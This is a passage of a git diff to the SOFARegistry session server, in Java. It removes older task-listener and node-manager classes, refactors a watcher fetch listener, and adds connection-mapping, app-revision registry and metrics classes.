-import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: SessionRegisterDataTaskListener.java, v 0.1 2018-04-16 16:30 shangyu.wh Exp $ - */ -public class SessionRegisterDataTaskListener implements TaskListener { - - /** - * DataNode service - */ - @Autowired - private DataNodeService dataNodeService; - - @Autowired - private Exchange boltExchange; - - @Autowired - private SessionServerConfig sessionServerConfig; - - private TaskDispatcher singleTaskDispatcher; - - private TaskProcessor dataNodeSingleTaskProcessor; - - public SessionRegisterDataTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createSingleTaskDispatcher( - TaskDispatchers.getDispatcherName(TaskType.SESSION_REGISTER_DATA_TASK.getName()), - 60, 5, 1000, 100, dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.SESSION_REGISTER_DATA_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - SessionTask sessionRegisterDataTask = new SessionRegisterDataTask(boltExchange, - dataNodeService, sessionServerConfig); - sessionRegisterDataTask.setTaskEvent(event); - getSingleTaskDispatcher().dispatch(sessionRegisterDataTask.getTaskId(), - sessionRegisterDataTask, sessionRegisterDataTask.getExpiryTime()); - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SubscriberMultiFetchTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SubscriberMultiFetchTaskListener.java deleted file mode 100644 index 773e5e367..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SubscriberMultiFetchTaskListener.java +++ /dev/null @@ -1,90 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SubscriberMultiFetchTask; -import com.alipay.sofa.registry.server.session.strategy.SubscriberMultiFetchTaskStrategy; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberRegisterFetchTaskListener.java, v 0.1 2017-12-07 19:53 shangyu.wh Exp $ - */ -public class SubscriberMultiFetchTaskListener implements TaskListener { - - @Autowired - private SessionServerConfig sessionServerConfig; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - @Autowired - private CacheService sessionCacheService; - - @Autowired - private SubscriberMultiFetchTaskStrategy subscriberMultiFetchTaskStrategy; - - private TaskDispatcher singleTaskDispatcher; - - private TaskProcessor dataNodeSingleTaskProcessor; - - public SubscriberMultiFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createSingleTaskDispatcher( - TaskDispatchers.getDispatcherName(TaskType.SUBSCRIBER_MULTI_FETCH_TASK.getName()), - 100000, 80, 0, 0, dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.SUBSCRIBER_MULTI_FETCH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - - SessionTask subscriberMultiFetchTask = new SubscriberMultiFetchTask(sessionServerConfig, - taskListenerManager, sessionCacheService, subscriberMultiFetchTaskStrategy); - - subscriberMultiFetchTask.setTaskEvent(event); - - getSingleTaskDispatcher().dispatch(subscriberMultiFetchTask.getTaskId(), - subscriberMultiFetchTask, subscriberMultiFetchTask.getExpiryTime()); - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SubscriberRegisterFetchTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SubscriberRegisterFetchTaskListener.java deleted file mode 100644 index 68b66cf63..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/SubscriberRegisterFetchTaskListener.java +++ /dev/null @@ -1,97 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.listener; - -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; -import com.alipay.sofa.registry.server.session.scheduler.task.SubscriberRegisterFetchTask; -import com.alipay.sofa.registry.server.session.strategy.SubscriberRegisterFetchTaskStrategy; -import com.alipay.sofa.registry.task.batcher.TaskDispatcher; -import com.alipay.sofa.registry.task.batcher.TaskDispatchers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListener; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberRegisterFetchTaskListener.java, v 0.1 2017-12-07 19:53 shangyu.wh Exp $ - */ -public class SubscriberRegisterFetchTaskListener implements TaskListener { - - @Autowired - private SessionServerConfig sessionServerConfig; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - /** - * DataNode service - */ - @Autowired - private DataNodeService dataNodeService; - - @Autowired - private CacheService sessionCacheService; - - @Autowired - private SubscriberRegisterFetchTaskStrategy subscriberRegisterFetchTaskStrategy; - - private TaskDispatcher singleTaskDispatcher; - - private TaskProcessor dataNodeSingleTaskProcessor; - - public SubscriberRegisterFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } - - public TaskDispatcher getSingleTaskDispatcher() { - if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createSingleTaskDispatcher(TaskDispatchers - .getDispatcherName(TaskType.SUBSCRIBER_REGISTER_FETCH_TASK.getName()), 200000, 80, - 1000, 100, dataNodeSingleTaskProcessor); - } - return singleTaskDispatcher; - } - - @Override - public boolean support(TaskEvent event) { - return TaskType.SUBSCRIBER_REGISTER_FETCH_TASK.equals(event.getTaskType()); - } - - @Override - public void handleEvent(TaskEvent event) { - - SessionTask subscriberRegisterFetchTask = new SubscriberRegisterFetchTask( - sessionServerConfig, taskListenerManager, dataNodeService, sessionCacheService, - subscriberRegisterFetchTaskStrategy); - - subscriberRegisterFetchTask.setTaskEvent(event); - - getSingleTaskDispatcher().dispatch(subscriberRegisterFetchTask.getTaskId(), - subscriberRegisterFetchTask, subscriberRegisterFetchTask.getExpiryTime()); - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/WatcherRegisterFetchTaskListener.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/WatcherRegisterFetchTaskListener.java index 68e4cd6f9..772d5a473 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/WatcherRegisterFetchTaskListener.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/listener/WatcherRegisterFetchTaskListener.java @@ -17,9 +17,9 @@ package com.alipay.sofa.registry.server.session.listener; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.MetaNodeService; import com.alipay.sofa.registry.server.session.scheduler.task.SessionTask; import com.alipay.sofa.registry.server.session.scheduler.task.WatcherRegisterFetchTask; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; import com.alipay.sofa.registry.task.batcher.TaskDispatcher; import com.alipay.sofa.registry.task.batcher.TaskDispatchers; import com.alipay.sofa.registry.task.batcher.TaskProcessor; @@ -30,58 +30,57 @@ import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: SubscriberRegisterFetchTaskListener.java, v 0.1 2017-12-07 19:53 shangyu.wh Exp $ */ public class WatcherRegisterFetchTaskListener implements TaskListener { - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired private SessionServerConfig sessionServerConfig; - /** - * trigger push client process - */ - @Autowired - private TaskListenerManager taskListenerManager; + /** trigger push client process */ + @Autowired private TaskListenerManager taskListenerManager; - /** - * MetaNode service - */ - @Autowired - private MetaNodeService metaNodeService; + /** MetaNode service */ + @Autowired private MetaServerService metaServerService; - private TaskDispatcher singleTaskDispatcher; + private volatile TaskDispatcher singleTaskDispatcher; - private TaskProcessor dataNodeSingleTaskProcessor; + private TaskProcessor dataNodeSingleTaskProcessor; - public WatcherRegisterFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { - this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; - } + public WatcherRegisterFetchTaskListener(TaskProcessor dataNodeSingleTaskProcessor) { + this.dataNodeSingleTaskProcessor = dataNodeSingleTaskProcessor; + } - public TaskDispatcher getSingleTaskDispatcher() { + public TaskDispatcher getSingleTaskDispatcher() { + if (singleTaskDispatcher == null) { + synchronized (this) { if (singleTaskDispatcher == null) { - singleTaskDispatcher = TaskDispatchers.createDefaultSingleTaskDispatcher( - TaskType.WATCHER_REGISTER_FETCH_TASK.getName(), dataNodeSingleTaskProcessor); + singleTaskDispatcher = + TaskDispatchers.createDefaultSingleTaskDispatcher( + TaskType.WATCHER_REGISTER_FETCH_TASK.getName(), dataNodeSingleTaskProcessor); } - return singleTaskDispatcher; + } } + return singleTaskDispatcher; + } - @Override - public boolean support(TaskEvent event) { - return TaskType.WATCHER_REGISTER_FETCH_TASK.equals(event.getTaskType()); - } + @Override + public TaskType support() { + return TaskType.WATCHER_REGISTER_FETCH_TASK; + } - @Override - public void handleEvent(TaskEvent event) { + @Override + public void handleEvent(TaskEvent event) { - SessionTask watcherRegisterFetchTask = new WatcherRegisterFetchTask(sessionServerConfig, - taskListenerManager, metaNodeService); + SessionTask watcherRegisterFetchTask = + new WatcherRegisterFetchTask(sessionServerConfig, taskListenerManager, metaServerService); - watcherRegisterFetchTask.setTaskEvent(event); - - getSingleTaskDispatcher().dispatch(watcherRegisterFetchTask.getTaskId(), - watcherRegisterFetchTask, watcherRegisterFetchTask.getExpiryTime()); - } + watcherRegisterFetchTask.setTaskEvent(event); -} \ No newline at end of file + getSingleTaskDispatcher() + .dispatch( + watcherRegisterFetchTask.getTaskId(), + watcherRegisterFetchTask, + watcherRegisterFetchTask.getExpiryTime()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/mapper/ConnectionMapper.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/mapper/ConnectionMapper.java new file mode 100644 index 000000000..3e0982434 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/mapper/ConnectionMapper.java @@ -0,0 +1,92 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.mapper; + +import com.google.common.collect.Maps; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; +import org.apache.commons.lang.StringUtils; + +/** + * @author ruoshan + * @since 5.4.1 + */ +public class ConnectionMapper { + + /** * */ + private final ConcurrentHashMap connectionToClientIpMap = + new ConcurrentHashMap<>(); + + /** + * 添加连接到 clientIp 的映射 + * + * @param connectId 连接 ip:port + * @param clientIp 客户端 ip + */ + public void add(String connectId, String clientIp) { + if (StringUtils.isNotEmpty(clientIp)) { + connectionToClientIpMap.putIfAbsent(connectId, clientIp); + } + } + + /** + * 删除连接到 clientIp 的映射 + * + * @param connectId 连接 ip:port + */ + public void remove(String connectId) { + connectionToClientIpMap.remove(connectId); + } + + /** + * 是否包含连接到 clientIp 的映射 + * + * @param connectId + * @return + */ + public boolean contains(String connectId) { + return connectionToClientIpMap.containsKey(connectId); + } + + /** + * 获取连接对应的 clientIp + * + * @param connectId 连接 ip:port + * @return clientIp + */ + public String get(String connectId) { + return connectionToClientIpMap.get(connectId); + } + + /** + * 获取连接映射的 size + * + * @return 连接映射的 size + */ + public int size() { + return connectionToClientIpMap.size(); + } + + /** + * 获取所有的连接映射 + * + * @return 连接映射表 + */ + public Map get() { + return Maps.newHashMap(connectionToClientIpMap); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/AppRevisionCacheRegistry.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/AppRevisionCacheRegistry.java new file mode 100644 index 000000000..8268c1e18 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/AppRevisionCacheRegistry.java @@ -0,0 +1,82 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.metadata; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.repository.AppRevisionRepository; +import com.alipay.sofa.registry.store.api.repository.InterfaceAppsRepository; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +public class AppRevisionCacheRegistry { + private static final Logger LOGGER = LoggerFactory.getLogger(AppRevisionCacheRegistry.class); + + @Autowired private AppRevisionRepository appRevisionRepository; + + @Autowired private InterfaceAppsRepository interfaceAppsRepository; + + private volatile boolean startWatch; + + private final class RevisionWatchDog extends LoopRunnable { + @Override + public void runUnthrowable() { + if (!startWatch) { + LOGGER.info("not start watch"); + return; + } + try { + appRevisionRepository.refresh(); + } catch (Throwable e) { + LOGGER.error("failed to watch", e); + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(5, TimeUnit.SECONDS); + } + } + + @PostConstruct + public void init() { + ConcurrentUtils.createDaemonThread("SessionRefreshRevisionWatchDog", new RevisionWatchDog()) + .start(); + } + + public void loadMetadata() { + interfaceAppsRepository.loadMetadata(); + startWatch = true; + } + + public void register(AppRevision appRevision) throws Exception { + appRevisionRepository.register(appRevision); + } + + public InterfaceMapping getAppNames(String dataInfoId) { + return interfaceAppsRepository.getAppNames(dataInfoId); + } + + public AppRevision getRevision(String revision) { + return appRevisionRepository.queryRevision(revision); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/AppRevisionHeartbeatRegistry.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/AppRevisionHeartbeatRegistry.java new file mode 100644 index 000000000..8d1c77f0a --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/AppRevisionHeartbeatRegistry.java @@ -0,0 +1,44 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.metadata; + +import com.alipay.sofa.registry.store.api.repository.AppRevisionHeartbeatRepository; +import com.alipay.sofa.registry.store.api.repository.AppRevisionRepository; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionHeartbeatRegistry.java, v 0.1 2021年02月09日 15:47 xiaojian.xj Exp $ + */ +public class AppRevisionHeartbeatRegistry { + + @Autowired private AppRevisionRepository appRevisionRepository; + + @Autowired private AppRevisionHeartbeatRepository appRevisionHeartbeatRepository; + + public boolean heartbeat(String revision) { + return appRevisionRepository.heartbeat(revision); + } + + public void doRevisionHeartbeat() { + appRevisionHeartbeatRepository.doAppRevisionHeartbeat(); + } + + public void doHeartbeatCacheChecker() { + appRevisionHeartbeatRepository.doHeartbeatCacheChecker(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/MetadataMetrics.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/MetadataMetrics.java new file mode 100644 index 000000000..608bc5347 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/metadata/MetadataMetrics.java @@ -0,0 +1,58 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.metadata; + +import io.prometheus.client.Counter; + +/** + * @author xiaojian.xj + * @version $Id: MetadataMetrics.java, v 0.1 2021年02月25日 16:34 xiaojian.xj Exp $ + */ +public class MetadataMetrics { + + private MetadataMetrics() {} + + static final class Fetch { + static final Counter METADATA_FETCH_COUNTER = + Counter.build() + .namespace("metadata") + .subsystem("fetch") + .name("metadata_fetch_total") + .help("metadata query revision and apps") + .register(); + + static final Counter.Child FETCH_REVISION_COUNTER = METADATA_FETCH_COUNTER.labels("revision"); + static final Counter.Child FETCH_APPS_COUNTER = METADATA_FETCH_COUNTER.labels("apps"); + } + + static final class Register { + + static final Counter METADATA_REGISTER_COUNTER = + Counter.build() + .namespace("metadata") + .subsystem("register") + .name("metadata_register_total") + .help("metadata revision register and heartbeat") + .register(); + + static final Counter.Child REVISION_REGISTER_COUNTER = + METADATA_REGISTER_COUNTER.labels("register"); + + static final Counter.Child REVISION_HEARTBEAT_COUNTER = + METADATA_REGISTER_COUNTER.labels("heartbeat"); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/AbstractNodeManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/AbstractNodeManager.java deleted file mode 100644 index 274aa4dc4..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/AbstractNodeManager.java +++ /dev/null @@ -1,168 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.metaserver.GetNodesRequest; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.util.VersionsMapUtils; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; - -/** - * - * @author shangyu.wh - * @version $Id: AbstractNodeManager.java, v 0.1 2018-03-05 10:44 shangyu.wh Exp $ - */ -public abstract class AbstractNodeManager implements NodeManager { - - private static final Logger LOGGER = LoggerFactory - .getLogger(AbstractNodeManager.class); - - private static final Logger EXCHANGE_LOGGER = LoggerFactory - .getLogger("SESSION-EXCHANGE"); - protected final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - protected final Lock read = readWriteLock - .readLock(); - protected final Lock write = readWriteLock - .writeLock(); - protected Map> nodes = new ConcurrentHashMap<>(); - @Autowired - protected SessionServerConfig sessionServerConfig; - - @Autowired - protected NodeExchanger metaNodeExchanger; - - @Autowired - protected RaftClientManager raftClientManager; - /** - * store other dataCenter data list version - */ - private ConcurrentHashMap dataCenterNodesVersions = new ConcurrentHashMap<>(); - - @Override - public Collection getDataCenterNodes() { - read.lock(); - try { - - Map dataMap = nodes.get(sessionServerConfig - .getSessionServerDataCenter()); - if (dataMap != null) { - return dataMap.values(); - } - } finally { - read.unlock(); - } - return new ArrayList<>(); - } - - @Override - public Collection getDataCenters() { - read.lock(); - try { - return nodes.keySet(); - } finally { - read.unlock(); - } - } - - @Override - public void updateNodes(NodeChangeResult nodeChangeResult) { - write.lock(); - try { - nodes = nodeChangeResult.getNodes(); - dataCenterNodesVersions.putIfAbsent(nodeChangeResult.getLocalDataCenter(), - nodeChangeResult.getVersion()); - } finally { - write.unlock(); - } - } - - public boolean checkAndUpdateListVersions(String dataCenterId, Long version) { - return VersionsMapUtils.checkAndUpdateVersions(dataCenterNodesVersions, dataCenterId, - version); - } - - @Override - public NodeChangeResult getAllDataCenterNodes() { - NodeChangeResult nodeChangeResult; - try { - - Request getNodesRequestRequest = new Request() { - - @Override - public GetNodesRequest getRequestBody() { - return new GetNodesRequest(getNodeType()); - } - - @Override - public URL getRequestUrl() { - return new URL(raftClientManager.getLeader().getIp(), - sessionServerConfig.getMetaServerPort()); - } - }; - - Response response = metaNodeExchanger.request(getNodesRequestRequest); - - if (response != null && response.getResult() != null) { - - nodeChangeResult = response.getResult(); - updateNodes(nodeChangeResult); - - EXCHANGE_LOGGER.info("Update node type {} success!info:{}", getNodeType(), - nodeChangeResult.getNodes()); - } else { - LOGGER.error( - "NodeManager get all dataCenter nodes type {} error!No response receive!", - getNodeType()); - throw new RuntimeException( - "NodeManager get all dataCenter nodes error!No response receive!"); - } - - } catch (RequestException e) { - LOGGER.error("NodeManager get all dataCenter nodes error! " + e.getRequestMessage(), e); - throw new RuntimeException("NodeManager get all dataCenter nodes error! " - + e.getRequestMessage(), e); - } - - return nodeChangeResult; - } - - /** - * Getter method for property dataCenterNodesVersions. - * - * @return property value of dataCenterNodesVersions - */ - @Override - public ConcurrentHashMap getDataCenterNodesVersions() { - return dataCenterNodesVersions; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/DataNodeManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/DataNodeManager.java deleted file mode 100644 index 894346efa..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/DataNodeManager.java +++ /dev/null @@ -1,77 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.consistency.hash.ConsistentHash; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeManager.java, v 0.1 2017-12-08 19:34 shangyu.wh Exp $ - */ -public class DataNodeManager extends AbstractNodeManager { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeManager.class, - "[DataNodeManager]"); - - @Autowired - private SessionServerConfig sessionServerConfig; - - private ConsistentHash consistentHash; - - @Override - public DataNode getNode(String dataInfoId) { - DataNode dataNode = consistentHash.getNodeFor(dataInfoId); - if (dataNode == null) { - LOGGER.error("calculate data node error!,dataInfoId={}", dataInfoId); - throw new RuntimeException("DataNodeManager calculate data node error!,dataInfoId=" - + dataInfoId); - } - return dataNode; - } - - @Override - public void updateNodes(NodeChangeResult nodeChangeResult) { - write.lock(); - try { - super.updateNodes(nodeChangeResult); - consistentHash = new ConsistentHash(sessionServerConfig.getNumberOfReplicas(), - getDataCenterNodes()); - - } finally { - write.unlock(); - } - } - - @Override - public NodeType getNodeType() { - return NodeType.DATA; - } - - @Override - public void reNewNode() { - - } - -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/MetaNodeManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/MetaNodeManager.java deleted file mode 100644 index 2a2095096..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/MetaNodeManager.java +++ /dev/null @@ -1,49 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; - -import java.util.Collection; - -/** - * - * @author shangyu.wh - * @version $Id: MetaNodeManager.java, v 0.1 2018-03-05 10:58 shangyu.wh Exp $ - */ -public class MetaNodeManager extends AbstractNodeManager { - - @Override - public MetaNode getNode(String dataInfoId) { - return null; - } - - @Override - public NodeType getNodeType() { - return NodeType.META; - } - - @Override - public Collection getDataCenters() { - return nodes.keySet(); - } - - @Override - public void reNewNode() { - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/NodeManager.java 